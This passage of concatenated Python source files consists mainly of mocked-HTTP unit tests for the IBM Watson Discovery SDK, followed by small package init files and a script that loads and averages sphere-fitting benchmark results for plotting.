status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.create_collection(environment_id='envid',
name="name",
description="",
language="",
configuration_id='confid')
discovery.create_collection(environment_id='envid',
name="name",
language="es",
description="")
discovery.get_collection('envid', 'collid')
called_url = urlparse(responses.calls[2].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
discovery.delete_collection(environment_id='envid',
collection_id='collid')
discovery.list_collection_fields(environment_id='envid',
collection_id='collid')
assert len(responses.calls) == 5
@responses.activate
def test_federated_query():
discovery_url = urljoin(base_discovery_url,
'environments/envid/query')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.federated_query('envid', ['collid1', 'collid2'], filter='colls.sha1::9181d244*')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_federated_query_notices():
discovery_url = urljoin(base_discovery_url,
'environments/envid/notices')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.federated_query_notices('envid', ['collid1', 'collid2'], filter='notices.sha1::9181d244*')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections/collid/query')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.query('envid', 'collid',
filter='extracted_metadata.sha1::9181d244*',
count=1,
passages=True,
passages_fields=['x', 'y'],
logging_opt_out='True',
passages_count=2)
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query_relations():
discovery_url = urljoin(
base_discovery_url,
'environments/envid/collections/collid/query_relations')
responses.add(
responses.POST,
discovery_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1(
'2016-11-07', username='username', password='password')
discovery.query_relations('envid', 'collid', count=10)
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1


@responses.activate
def test_query_entities():
    discovery_url = urljoin(
        base_discovery_url,
        'environments/envid/collections/collid/query_entities')
    responses.add(
        responses.POST,
        discovery_url,
        body='{"body": "hello"}',
        status=200,
        content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1(
        '2016-11-07', username='username', password='password')
    discovery.query_entities('envid', 'collid', {'count': 10})
    called_url = urlparse(responses.calls[0].request.url)
    test_url = urlparse(discovery_url)
    assert called_url.netloc == test_url.netloc
    assert called_url.path == test_url.path
    assert len(responses.calls) == 1


@responses.activate
def test_query_notices():
    discovery_url = urljoin(
        base_discovery_url,
        'environments/envid/collections/collid/notices')
    responses.add(
        responses.GET,
        discovery_url,
        body='{"body": "hello"}',
        status=200,
        content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1(
        '2016-11-07', username='username', password='password')
    discovery.query_notices('envid', 'collid', filter='notices.sha1::*')
    called_url = urlparse(responses.calls[0].request.url)
    test_url = urlparse(discovery_url)
    assert called_url.netloc == test_url.netloc
    assert called_url.path == test_url.path
    assert len(responses.calls) == 1


@responses.activate
def test_configs():
    discovery_url = urljoin(base_discovery_url,
                            'environments/envid/configurations')
    discovery_config_id = urljoin(base_discovery_url,
                                  'environments/envid/configurations/confid')
    results = {"configurations":
               [{"name": "Default Configuration",
                 "configuration_id": "confid"}]}
    responses.add(responses.GET, discovery_url,
                  body=json.dumps(results),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET, discovery_config_id,
                  body=json.dumps(results['configurations'][0]),
                  status=200,
                  content_type='application/json')
    responses.add(responses.POST, discovery_url,
                  body=json.dumps(results['configurations'][0]),
                  status=200,
                  content_type='application/json')
    responses.add(responses.PUT, discovery_config_id,
                  body=json.dumps(results['configurations'][0]),
                  status=200,
                  content_type='application/json')
    responses.add(responses.DELETE, discovery_config_id,
                  body=json.dumps({'deleted': 'bogus -- ok'}),
                  status=200,
                  content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
                                                   username='username',
                                                   password='password')
    discovery.list_configurations(environment_id='envid')
    discovery.get_configuration(environment_id='envid',
                                configuration_id='confid')
    assert len(responses.calls) == 2
    discovery.create_configuration(environment_id='envid',
                                   name='my name')
    discovery.create_configuration(environment_id='envid',
                                   name='my name',
                                   source={'type': 'salesforce',
                                           'credential_id': 'xxx'})
    discovery.update_configuration(environment_id='envid',
                                   configuration_id='confid',
                                   name='my new name')
    discovery.update_configuration(environment_id='envid',
                                   configuration_id='confid',
                                   name='my new name',
                                   source={'type': 'salesforce',
                                           'credential_id': 'xxx'})
    discovery.delete_configuration(environment_id='envid',
                                   configuration_id='confid')
    assert len(responses.calls) == 7


@responses.activate
def test_document():
    discovery_url = urljoin(base_discovery_url,
                            'environments/envid/preview')
    config_url = urljoin(base_discovery_url,
                         'environments/envid/configurations')
    responses.add(responses.POST, discovery_url,
                  body='{"configurations": []}',
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET, config_url,
                  body=json.dumps({"configurations":
                                   [{"name": "Default Configuration",
                                     "configuration_id": "confid"}]}),
                  status=200,
                  content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
                                                   username='username',
                                                   password='password')
    html_path = os.path.join(os.getcwd(), 'resources', 'simple.html')
    with open(html_path) as fileinfo:
        conf_id = discovery.test_configuration_in_environment(
            environment_id='envid',
            configuration_id='bogus',
            file=fileinfo)
        assert conf_id is not None
        conf_id = discovery.test_configuration_in_environment(
            environment_id='envid',
            file=fileinfo)
        assert conf_id is not None
    assert len(responses.calls) == 2
    add_doc_url = urljoin(base_discovery_url,
                          'environments/envid/collections/collid/documents')
    doc_id_path = 'environments/envid/collections/collid/documents/docid'
    update_doc_url = urljoin(base_discovery_url, doc_id_path)
    del_doc_url = urljoin(base_discovery_url, doc_id_path)
    responses.add(responses.POST, add_doc_url,
                  body='{"body": []}',
                  status=200,
                  content_type='application/json')
    doc_status = {
        "document_id": "45556e23-f2b1-449d-8f27-489b514000ff",
        "configuration_id": "2e079259-7dd2-40a9-998f-3e716f5a7b88",
        "created": "2016-06-16T10:56:54.957Z",
        "updated": "2017-05-16T13:56:54.957Z",
        "status": "available",
        "status_description": "Document is successfully ingested and indexed with no warnings",
        "notices": []
    }
    responses.add(responses.GET, del_doc_url,
                  body=json.dumps(doc_status),
                  status=200,
                  content_type='application/json')
    responses.add(responses.POST, update_doc_url,
                  body='{"body": []}',
                  status=200,
                  content_type='application/json')
    responses.add(responses.DELETE, del_doc_url,
                  body='{"body": []}',
                  status=200,
                  content_type='application/json')
    html_path = os.path.join(os.getcwd(), 'resources', 'simple.html')
    with open(html_path) as fileinfo:
        conf_id = discovery.add_document(environment_id='envid',
                                         collection_id='collid',
                                         file=fileinfo)
        assert conf_id is not None
    assert len(responses.calls) == 3
    discovery.get_document_status(environment_id='envid',
                                  collection_id='collid',
                                  document_id='docid')
    assert len(responses.calls) == 4
    discovery.update_document(environment_id='envid',
                              collection_id='collid',
                              document_id='docid')
    assert len(responses.calls) == 5
    discovery.update_document(environment_id='envid',
                              collection_id='collid',
                              document_id='docid')
    assert len(responses.calls) == 6
    discovery.delete_document(environment_id='envid',
                              collection_id='collid',
                              document_id='docid')
    assert len(responses.calls) == 7
    conf_id = discovery.add_document(environment_id='envid',
                                     collection_id='collid',
                                     file=io.StringIO(u'my string of file'),
                                     filename='file.txt')
    assert len(responses.calls) == 8
    conf_id = discovery.add_document(environment_id='envid',
                                     collection_id='collid',
                                     file=io.StringIO(u'<h1>my string of file</h1>'),
                                     filename='file.html',
                                     file_content_type='application/html')
    assert len(responses.calls) == 9
    conf_id = discovery.add_document(environment_id='envid',
                                     collection_id='collid',
                                     file=io.StringIO(u'<h1>my string of file</h1>'),
                                     filename='file.html',
                                     file_content_type='application/html',
                                     metadata=io.StringIO(u'{"stuff": "woot!"}'))
    assert len(responses.calls) == 10


@responses.activate
def test_delete_all_training_data():
    training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
    endpoint = training_endpoint.format(environment_id, collection_id)
    url = '{0}{1}'.format(base_url, endpoint)
    responses.add(responses.DELETE, url, status=204)
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.delete_all_training_data(
        environment_id=environment_id,
        collection_id=collection_id).get_result()
    assert response is None


@responses.activate
def test_list_training_data():
    training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
    endpoint = training_endpoint.format(environment_id, collection_id)
    url = '{0}{1}'.format(base_url, endpoint)
    mock_response = {
        "environment_id": "string",
        "collection_id": "string",
        "queries": [
            {
                "query_id": "string",
                "natural_language_query": "string",
                "filter": "string",
                "examples": [
                    {
                        "document_id": "string",
                        "cross_reference": "string",
                        "relevance": 0
                    }
                ]
            }
        ]
    }
    responses.add(responses.GET,
                  url,
                  body=json.dumps(mock_response),
                  status=200,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.list_training_data(
        environment_id=environment_id,
        collection_id=collection_id).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingDataSet
    TrainingDataSet._from_dict(response)


@responses.activate
def test_add_training_data():
    training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
    endpoint = training_endpoint.format(environment_id, collection_id)
    url = '{0}{1}'.format(base_url, endpoint)
    natural_language_query = "why is the sky blue"
    filter = "text:meteorology"
    examples = [
        {
            "document_id": "54f95ac0-3e4f-4756-bea6-7a67b2713c81",
            "relevance": 1
        },
        {
            "document_id": "01bcca32-7300-4c9f-8d32-33ed7ea643da",
            "cross_reference": "my_id_field:1463",
            "relevance": 5
        }
    ]
    mock_response = {
        "query_id": "string",
        "natural_language_query": "string",
        "filter": "string",
        "examples": [
            {
                "document_id": "string",
                "cross_reference": "string",
                "relevance": 0
            }
        ]
    }
    responses.add(responses.POST,
                  url,
                  body=json.dumps(mock_response),
                  status=200,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.add_training_data(
        environment_id=environment_id,
        collection_id=collection_id,
        natural_language_query=natural_language_query,
        filter=filter,
        examples=examples).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingQuery
    TrainingQuery._from_dict(response)


@responses.activate
def test_delete_training_data():
    training_endpoint = '/v1/environments/{0}/collections/{1}/training_data/{2}'
    query_id = 'queryid'
    endpoint = training_endpoint.format(
        environment_id, collection_id, query_id)
    url = '{0}{1}'.format(base_url, endpoint)
    responses.add(responses.DELETE, url, status=204)
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.delete_training_data(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id).get_result()
    assert response is None


@responses.activate
def test_get_training_data():
    training_endpoint = '/v1/environments/{0}/collections/{1}/training_data/{2}'
    query_id = 'queryid'
    endpoint = training_endpoint.format(
        environment_id, collection_id, query_id)
    url = '{0}{1}'.format(base_url, endpoint)
    mock_response = {
        "query_id": "string",
        "natural_language_query": "string",
        "filter": "string",
        "examples": [
            {
                "document_id": "string",
                "cross_reference": "string",
                "relevance": 0
            }
        ]
    }
    responses.add(responses.GET,
                  url,
                  body=json.dumps(mock_response),
                  status=200,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.get_training_data(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingQuery
    TrainingQuery._from_dict(response)


@responses.activate
def test_create_training_example():
    examples_endpoint = ('/v1/environments/{0}/collections/{1}/training_data'
                         '/{2}/examples')
    query_id = 'queryid'
    endpoint = examples_endpoint.format(
        environment_id, collection_id, query_id)
    url = '{0}{1}'.format(base_url, endpoint)
    document_id = "string"
    relevance = 0
    cross_reference = "string"
    mock_response = {
        "document_id": "string",
        "cross_reference": "string",
        "relevance": 0
    }
    responses.add(responses.POST,
                  url,
                  body=json.dumps(mock_response),
                  status=201,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.create_training_example(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id,
        document_id=document_id,
        relevance=relevance,
        cross_reference=cross_reference).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingExample
    TrainingExample._from_dict(response)


@responses.activate
def test_delete_training_example():
    examples_endpoint = ('/v1/environments/{0}/collections/{1}/training_data'
                         '/{2}/examples/{3}')
    query_id = 'queryid'
    example_id = 'exampleid'
    endpoint = examples_endpoint.format(environment_id,
                                        collection_id,
                                        query_id,
                                        example_id)
    url = '{0}{1}'.format(base_url, endpoint)
    responses.add(responses.DELETE, url, status=204)
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.delete_training_example(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id,
        example_id=example_id).get_result()
    assert response is None


@responses.activate
def test_get_training_example():
    examples_endpoint = ('/v1/environments/{0}/collections/{1}/training_data'
                         '/{2}/examples/{3}')
    query_id = 'queryid'
    example_id = 'exampleid'
    endpoint = examples_endpoint.format(environment_id,
                                        collection_id,
                                        query_id,
                                        example_id)
    url = '{0}{1}'.format(base_url, endpoint)
    mock_response = {
        "document_id": "string",
        "cross_reference": "string",
        "relevance": 0
    }
    responses.add(responses.GET,
                  url,
                  body=json.dumps(mock_response),
                  status=200,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.get_training_example(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id,
        example_id=example_id).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingExample
    TrainingExample._from_dict(response)


@responses.activate
def test_update_training_example():
    examples_endpoint = ('/v1/environments/{0}/collections/{1}/training_data'
                         '/{2}/examples/{3}')
    query_id = 'queryid'
    example_id = 'exampleid'
    endpoint = examples_endpoint.format(environment_id,
                                        collection_id,
                                        query_id,
                                        example_id)
    url = '{0}{1}'.format(base_url, endpoint)
    relevance = 0
    cross_reference = "string"
    mock_response = {
        "document_id": "string",
        "cross_reference": "string",
        "relevance": 0
    }
    responses.add(responses.PUT,
                  url,
                  body=json.dumps(mock_response),
                  status=200,
                  content_type='application/json')
    service = watson_developer_cloud.DiscoveryV1(version,
                                                 username='username',
                                                 password='password')
    response = service.update_training_example(
        environment_id=environment_id,
        collection_id=collection_id,
        query_id=query_id,
        example_id=example_id,
        relevance=relevance,
        cross_reference=cross_reference).get_result()
    assert response == mock_response
    # Verify that response can be converted to a TrainingExample
    TrainingExample._from_dict(response)


@responses.activate
def test_expansions():
    url = ('https://gateway.watsonplatform.net/discovery/api/v1/'
           'environments/envid/collections/colid/expansions')
    responses.add(
        responses.GET,
        url,
        body='{"expansions": "results"}',
        status=200,
        content_type='application/json')
    responses.add(
        responses.DELETE,
        url,
        body='{"description": "success" }',
        status=200,
        content_type='application/json')
    responses.add(
        responses.POST,
        url,
        body='{"expansions": "success" }',
        status=200,
        content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1(
        '2017-11-07', username='username', password='password')
    discovery.list_expansions('envid', 'colid')
    assert responses.calls[0].response.json() == {"expansions": "results"}
    discovery.create_expansions('envid', 'colid',
                                [{"input_terms": "dumb",
                                  "expanded_terms": "dumb2"}])
    assert responses.calls[1].response.json() == {"expansions": "success"}
    discovery.delete_expansions('envid', 'colid')
    assert responses.calls[2].response.json() == {"description": "success"}
    assert len(responses.calls) == 3


@responses.activate
def test_delete_user_data():
    url = 'https://gateway.watsonplatform.net/discovery/api/v1/user_data'
    responses.add(
        responses.DELETE,
        url,
        body='{"description": "success" }',
        status=204,
        content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1(
        '2017-11-07', username='username', password='password')
    response = discovery.delete_user_data('id').get_result()
    assert response is None
    assert len(responses.calls) == 1


@responses.activate
def test_credentials():
    discovery_credentials_url = urljoin(base_discovery_url,
                                        'environments/envid/credentials')
    results = {'credential_id': 'e68305ce-29f3-48ea-b829-06653ca0fdef',
               'source_type': 'salesforce',
               'credential_details': {
                   'url': 'https://login.salesforce.com',
                   'credential_type': 'username_password',
                   'username': 'user@email.com'}}
    iam_url = "https://iam.bluemix.net/identity/token"
    iam_token_response = """{
        "access_token": "oAeisG8yqPY7sFR_x66Z15",
        "token_type": "Bearer",
        "expires_in": 3600,
        "expiration": 1524167011,
        "refresh_token": "jy4gl91BQ"
    }"""
    responses.add(responses.POST, url=iam_url, body=iam_token_response,
                  status=200)
    responses.add(responses.GET,
                  "{0}/{1}?version=2016-11-07".format(
                      discovery_credentials_url, 'credential_id'),
                  body=json.dumps(results),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(discovery_credentials_url),
                  body=json.dumps([results]),
                  status=200,
                  content_type='application/json')
    responses.add(responses.POST,
                  "{0}?version=2016-11-07".format(discovery_credentials_url),
                  body=json.dumps(results),
                  status=200,
                  content_type='application/json')
    results['source_type'] = 'ibm'
    responses.add(responses.PUT,
                  "{0}/{1}?version=2016-11-07".format(
                      discovery_credentials_url, 'credential_id'),
                  body=json.dumps(results),
                  status=200,
                  content_type='application/json')
    responses.add(responses.DELETE,
                  "{0}/{1}?version=2016-11-07".format(
                      discovery_credentials_url, 'credential_id'),
                  body=json.dumps({'deleted': 'bogus -- ok'}),
                  status=200,
                  content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
                                                   iam_apikey='iam_apikey')
    discovery.create_credentials('envid', 'salesforce', {
        'url': 'https://login.salesforce.com',
        'credential_type': 'username_password',
        'username': 'user@email.com'
    })
    discovery.get_credentials('envid', 'credential_id')
    discovery.update_credentials(environment_id='envid',
                                 credential_id='credential_id',
                                 source_type='salesforce',
                                 credential_details=results['credential_details'])
    discovery.list_credentials('envid')
    discovery.delete_credentials(environment_id='envid',
                                 credential_id='credential_id')
    assert len(responses.calls) == 10


@responses.activate
def test_events_and_feedback():
    discovery_event_url = urljoin(base_discovery_url, 'events')
    discovery_metrics_event_rate_url = urljoin(base_discovery_url,
                                               'metrics/event_rate')
    discovery_metrics_query_url = urljoin(base_discovery_url,
                                          'metrics/number_of_queries')
    discovery_metrics_query_event_url = urljoin(
        base_discovery_url, 'metrics/number_of_queries_with_event')
    discovery_metrics_query_no_results_url = urljoin(
        base_discovery_url, 'metrics/number_of_queries_with_no_search_results')
    discovery_metrics_query_token_event_url = urljoin(
        base_discovery_url, 'metrics/top_query_tokens_with_event_rate')
    discovery_query_log_url = urljoin(base_discovery_url, 'logs')
    event_data = {
        "environment_id": "xxx",
        "session_token": "yyy",
        "client_timestamp": "2018-08-14T14:39:59.268Z",
        "display_rank": 0,
        "collection_id": "abc",
        "document_id": "xyz",
        "query_id": "cde"
    }
    create_event_response = {
        "type": "click",
        "data": event_data
    }
    metric_response = {
        "aggregations": [
            {
                "interval": "1d",
                "event_type": "click",
                "results": [
                    {
                        "key_as_string": "2018-08-14T14:39:59.309Z",
                        "key": 1533513600000,
                        "matching_results": 2,
                        "event_rate": 0.0
                    }
                ]
            }
        ]
    }
    metric_token_response = {
        "aggregations": [
            {
                "event_type": "click",
                "results": [
                    {
                        "key": "content",
                        "matching_results": 5,
                        "event_rate": 0.6
                    },
                    {
                        "key": "first",
                        "matching_results": 5,
                        "event_rate": 0.6
                    },
                    {
                        "key": "of",
                        "matching_results": 5,
                        "event_rate": 0.6
                    }
                ]
            }
        ]
    }
    log_query_response = {
        "matching_results": 20,
        "results": [
            {
                "customer_id": "",
                "environment_id": "xxx",
                "natural_language_query": "The content of the first chapter",
                "query_id": "1ICUdh3Pab",
                "document_results": {
                    "count": 1,
                    "results": [
                        {
                            "collection_id": "b67a82f3-6507-4c25-9757-3485ff4f2a32",
                            "score": 0.025773458,
                            "position": 10,
                            "document_id": "af0be20e-e130-4712-9a2e-37d9c8b9c52f"
                        }
                    ]
                },
                "event_type": "query",
                "session_token": "1_nbEfQtKVcg9qx3t41ICUdh3Pab",
                "created_timestamp": "2018-08-14T18:20:30.460Z"
            }
        ]
    }
    iam_url = "https://iam.bluemix.net/identity/token"
    iam_token_response = """{
        "access_token": "oAeisG8yqPY7sFR_x66Z15",
        "token_type": "Bearer",
        "expires_in": 3600,
        "expiration": 1524167011,
        "refresh_token": "jy4gl91BQ"
    }"""
    responses.add(responses.POST, url=iam_url, body=iam_token_response,
                  status=200)
    responses.add(responses.POST,
                  "{0}?version=2016-11-07".format(discovery_event_url),
                  body=json.dumps(create_event_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(
                      discovery_metrics_event_rate_url),
                  body=json.dumps(metric_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(discovery_metrics_query_url),
                  body=json.dumps(metric_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(
                      discovery_metrics_query_event_url),
                  body=json.dumps(metric_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(
                      discovery_metrics_query_no_results_url),
                  body=json.dumps(metric_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(
                      discovery_metrics_query_token_event_url),
                  body=json.dumps(metric_token_response),
                  status=200,
                  content_type='application/json')
    responses.add(responses.GET,
                  "{0}?version=2016-11-07".format(discovery_query_log_url),
                  body=json.dumps(log_query_response),
                  status=200,
                  content_type='application/json')
    discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
                                                   iam_apikey='iam_apikey')
    discovery.create_event('click', event_data)
    assert responses.calls[1].response.json()["data"] == event_data
    discovery.get_metrics_event_rate('2018-08-13T14:39:59.309Z',
                                     '2018-08-14T14:39:59.309Z',
                                     'document')
    assert responses.calls[3].response.json() == metric_response
    discovery.get_metrics_query('2018-08-13T14:39:59.309Z',
                                '2018-08-14T14:39:59.309Z',
                                'document')
    assert responses.calls[5].response.json() == metric_response
    discovery.get_metrics_query_event('2018-08-13T14:39:59.309Z',
                                      '2018-08-14T14:39:59.309Z',
                                      'document')
    assert responses.calls[7].response.json() == metric_response
    discovery.get_metrics_query_no_results('2018-08-13T14:39:59.309Z',
                                           '2018-08-14T14:39:59.309Z',
                                           'document')
    assert responses.calls[9].response.json() == metric_response
    discovery.get_metrics_query_token_event(2)
    assert responses.calls[11].response.json() == metric_token_response
    discovery.query_log()
    assert responses.calls[13].response.json() == log_query_response
    assert len(responses.calls) == 14
# utils/models/mednet/__init__.py (bhklab/ptl-oar-segmentation, Apache-2.0)
from .model import ResNetMed3D, generate_resnet3d
# aspirelt/web.py (Constructionware/aspireLight, MIT)
from aspire.responder import Request, Response
from aspire.cli import cli
# venv/lib/python2.7/UserDict.py (sunlum/Deep-Semantic-Space-NST, MIT)
# XSym symlink stub pointing to /anaconda2/lib/python2.7/UserDict.py
# tests/contrib/django/models.py (raven-python, BSD-3-Clause)
from __future__ import absolute_import

from django.db import models


class MyTestModel(models.Model):
    pass
# djangomaster/master/__init__.py (kpekepoh/django-aww, MIT)
from djangomaster.master.home import HomeView, SettingsView
from djangomaster.master.routes import RoutesView
from djangomaster.master.signals import SignalsView
from djangomaster.master.templatetags import TemplateTagsView
from djangomaster.master.migrations import MigrationsView
from djangomaster.master.models import ModelsView
# __init__.py (Brayneded/vcoclient, MIT)
from .vcoclient import VcoClient
# tests/tests_utilities/micro_mock.py (ComaszTyrulik/BasicCppSetupScripts, MIT)
def MicroMock(**kwargs):
    return type('Object', (), kwargs)()
# Deep_CNN_Project/hi.py (yjun1806/find_receipe, MIT)
import train_util

train_util.print_model_architecture('inception_v3')
# itscsapp/contact/models/__init__.py (danyRivC/itscsapp, MIT)
from itscsapp.contact.models import contact
ee44935c916e0d7324603075e6ec821ad87a7177 | 11,499 | py | Python | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | 3 | 2018-03-23T12:58:42.000Z | 2020-11-16T14:09:31.000Z | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | null | null | null | test/sphere_performance_plots.py | jglrxavpok/shape-fitting | cf5a159f8bd97a30e2389b0ef2fe271f5a237685 | [
"MIT"
] | 3 | 2020-01-12T07:17:06.000Z | 2020-04-03T03:06:25.000Z | #
# Copyright (C) 2018 Rui Pimentel de Figueiredo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# \author Rui Figueiredo : ruipimentelfigueiredo
#
#! /usr/bin/env python
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from os import path
#plt.rc('text', usetex=True)
import numpy as np
import math
home=path.expanduser('~/ws/src/shape_detection_fitting/lib/')
def to_percent(y, position):
    # Ignore the passed-in position. This has the effect of scaling the default
    # tick locations.
    s = str(100 * y)
    # The percent symbol needs escaping in LaTeX
    if plt.rcParams['text.usetex'] is True:
        return s  # + r'$\%$'
    else:
        return s  # + '%'
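The `to_percent` helper above is written for matplotlib's `FuncFormatter`, although this script never actually attaches it to an axis. A minimal sketch of the intended wiring (the figure and axis here are illustrative, not from the original script):

```python
import matplotlib
matplotlib.use('Agg')  # render off-screen; no display needed
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter

def to_percent(y, position):
    # same formatter as above: scale fractional tick values to percentages
    return str(100 * y)

fig, ax = plt.subplots()
ax.plot([0, 1], [0.0, 0.5])
# every y tick now runs through to_percent, so 0.5 renders as '50.0'
ax.yaxis.set_major_formatter(FuncFormatter(to_percent))
fig.savefig('percent_axis.png')
```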
radii=1
iterations=500
ground_truth_size=radii
outlier_levels=1
noise_levels_number=11
noise_index=0
outlier_index=0
occlusion_index=0
alpha_=0.1
fontsize_=20
error_levels=[0,5,10,15,20,25,30,35,40,45,50]
noise_levels_number=len(error_levels)
#outlier_levels_=[0,25,50,75,100,125,150,175,200]
outlier_levels_=[0.0]
occlusion_levels_=[0.0]
occlusion_levels_number=1
colors=['green','blue','red','black']
labels=['Ours (Unbiased)','Ours (Unbiased and soft-voting)','Ours (Weak Vertical-Bias)','Ours (Weak Vertical-Bias and soft-voting)','Ours (Strong Vertical-Bias)','Ours (Strong Vertical-Bias and soft-voting)']
linestyles = ['-', '--']
linethickness=[1, 2, 3, 4, 5]
#POSITION
hough_position_results_0=[]
hough_position_results_1=[]
hough_position_results_2=[]
hough_position_results_3=[]
hough_position_file_0 = open(home + "shape-fitting/dataset/sphere/results/position_noise_0.txt", "r")
hough_position_file_1 = open(home + "shape-fitting/dataset/sphere/results/position_noise_1.txt", "r")
for line in hough_position_file_0:
    hough_position_results_0.append(float(line))
hough_position_results_0 = np.array(hough_position_results_0).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
for line in hough_position_file_1:
    hough_position_results_1.append(float(line))
hough_position_results_1 = np.array(hough_position_results_1).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
#RADIUS
hough_radius_results_0=[]
hough_radius_results_1=[]
hough_radius_results_2=[]
hough_radius_results_3=[]
hough_radius_file_0 = open(home + "shape-fitting/dataset/sphere/results/radius_noise_0.txt", "r")
hough_radius_file_1 = open(home + "shape-fitting/dataset/sphere/results/radius_noise_1.txt", "r")
for line in hough_radius_file_0:
    hough_radius_results_0.append(float(line))
hough_radius_results_0 = np.array(hough_radius_results_0).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
for line in hough_radius_file_1:
    hough_radius_results_1.append(float(line))
hough_radius_results_1 = np.array(hough_radius_results_1).reshape(iterations,outlier_levels,occlusion_levels_number,ground_truth_size,noise_levels_number)
# compute position average and standard deviation
hough_position_results_mean_0 = np.mean(hough_position_results_0, axis=(0,3))
hough_position_results_std_0 = np.std(hough_position_results_0, axis=(0,3))
hough_position_results_mean_1 = np.mean(hough_position_results_1, axis=(0,3))
hough_position_results_std_1 = np.std(hough_position_results_1, axis=(0,3))
# compute radius average and standard deviation
hough_radius_results_mean_0 = np.mean(hough_radius_results_0, axis=(0,3))
hough_radius_results_std_0 = np.std(hough_radius_results_0, axis=(0,3))
hough_radius_results_mean_1 = np.mean(hough_radius_results_1, axis=(0,3))
hough_radius_results_std_1 = np.std(hough_radius_results_1, axis=(0,3))
